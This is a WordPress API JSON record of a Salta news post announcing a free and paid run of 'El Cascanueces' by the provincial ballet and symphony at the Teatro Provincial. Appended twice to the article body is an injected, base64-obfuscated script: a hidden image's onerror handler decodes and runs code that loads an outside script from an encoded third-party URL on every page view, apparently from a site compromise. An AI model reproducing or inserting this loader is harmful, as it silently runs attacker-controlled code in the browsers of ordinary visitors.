{"id":4681,"date":"2024-12-13T09:13:59","date_gmt":"2024-12-13T12:13:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4681"},"modified":"2025-08-13T23:43:38","modified_gmt":"2025-08-14T02:43:38","slug":"el-cascanueces-se-presenta-al-publico-en-el-teatro-provincial-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4681","title":{"rendered":"\u00abEl Cascanueces\u00bb se presenta al p\u00fablico en el Teatro Provincial de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d45845578a7f1ba83e37a1d820c31d85\" style=\"background-color:#4d3a08\"><em><strong>El Ballet de la Provincia de Salta presenta el cl\u00e1sico navide\u00f1o hasta ma\u00f1ana 14 de diciembre en el Teatro Provincial. Entrada gratuita para jubilados y estudiantes.<\/strong><\/em><\/h4>\n\n\n\n<p>La Secretar\u00eda de Cultura de la Provincia y el Ballet Oficial de la Provincia de Salta invitan al espect\u00e1culo \u201cEl Cascanueces\u201d, un cl\u00e1sico inmortal de la danza, que se presentar\u00e1 en el Teatro Provincial Juan Carlos Saravia hasta ma\u00f1ana&nbsp;a las 21 horas.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4682\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9659-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp\" alt=\"\" class=\"wp-image-4682\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9659-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9659-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9659-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9659-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9659-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9659-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4683\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9658-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp\" alt=\"\" class=\"wp-image-4683\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9658-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9658-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9658-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9658-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9658-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9658-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4684\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9657-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp\" alt=\"\" class=\"wp-image-4684\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9657-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9657-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9657-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9657-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9657-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9657-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>La puesta en escena forma parte del ciclo Salta de Fiesta y contar\u00e1 con la direcci\u00f3n art\u00edstica de&nbsp;<strong>Laura Fiorucci<\/strong>, la participaci\u00f3n de la Orquesta Sinf\u00f3nica de Salta, bajo la batuta de su director titular&nbsp;<strong>Jorge Mario Uribe<\/strong>, y el Coro Infantil de la Orquesta Sinf\u00f3nica Infantil y Juvenil de Salta, bajo la direcci\u00f3n de&nbsp;<strong>Cecilia Cafrune<\/strong>&nbsp;y&nbsp;<strong>Luciano Garay<\/strong>. Adem\u00e1s, la Escuela Oficial de Ballet, dirigida por&nbsp;<strong>Alejandra Cercen\u00e1<\/strong>, tambi\u00e9n participar\u00e1 como cuerpo art\u00edstico.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15218-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15218-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta.webp\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>Al respecto, la directora art\u00edstica de \u00abEl Cascanueces\u00bb,&nbsp;<strong>Laura Fiorucci<\/strong>, extendi\u00f3 una invitaci\u00f3n abierta al p\u00fablico en general: \u00abQuiero invitarlas e invitarlos a todos a que vengan a ver nuestra versi\u00f3n de El Cascanueces\u00bb. Y agreg\u00f3: \u00abCon m\u00e1s de 100 artistas en escena, la producci\u00f3n contar\u00e1 con la participaci\u00f3n de cuatro cuerpos art\u00edsticos de la provincia, para dar vida a esta versi\u00f3n divertida, fresca y alegre del cl\u00e1sico navide\u00f1o, no se van a arrepentir\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4686\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9656-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp\" alt=\"\" class=\"wp-image-4686\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9656-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9656-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9656-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9656-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9656-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9656-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"315\" data-id=\"4685\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/99139-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-20241210105519.webp\" alt=\"\" class=\"wp-image-4685\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/99139-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-20241210105519.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/99139-el-cascanueces-se-presentara-al-publico-en-el-teatro-provincial-de-salta-20241210105519-300x169.webp 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Con una narrativa cautivadora, \u00abEl Cascanueces\u00bb narra la m\u00e1gica aventura de Clara, quien, en la noche de Navidad, se embarca en un viaje on\u00edrico a un reino donde los juguetes cobran vida. La combinaci\u00f3n de danza, m\u00fasica y un dise\u00f1o esc\u00e9nico encantador promete transportarnos a un mundo lleno de fantas\u00eda.<\/p>\n\n\n\n<p>Las entradas ya se encuentran disponibles desde 6.000 pesos y se pueden adquirir en las taquillas del teatro o mediante la plataforma saltaticket.gob.ar. Las entradas gratuitas para adultos mayores y estudiantes tendr\u00e1n un cupo de hasta 200 entradas por funci\u00f3n.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong>Secretar\u00eda de Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ballet de la Provincia de Salta presenta el cl\u00e1sico navide\u00f1o hasta ma\u00f1ana 14 de diciembre en el Teatro Provincial. Entrada gratuita para jubilados y estudiantes. La Secretar\u00eda de Cultura de la Provincia y el Ballet Oficial de la Provincia de Salta invitan al espect\u00e1culo \u201cEl Cascanueces\u201d, un cl\u00e1sico inmortal de la danza, que se [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4686,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-4681","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4681"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4681"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4681\/revisions"}],"predecessor-version":[{"id":6612,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4681\/revisions\/6612"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4686"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4681"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4681"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4681"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}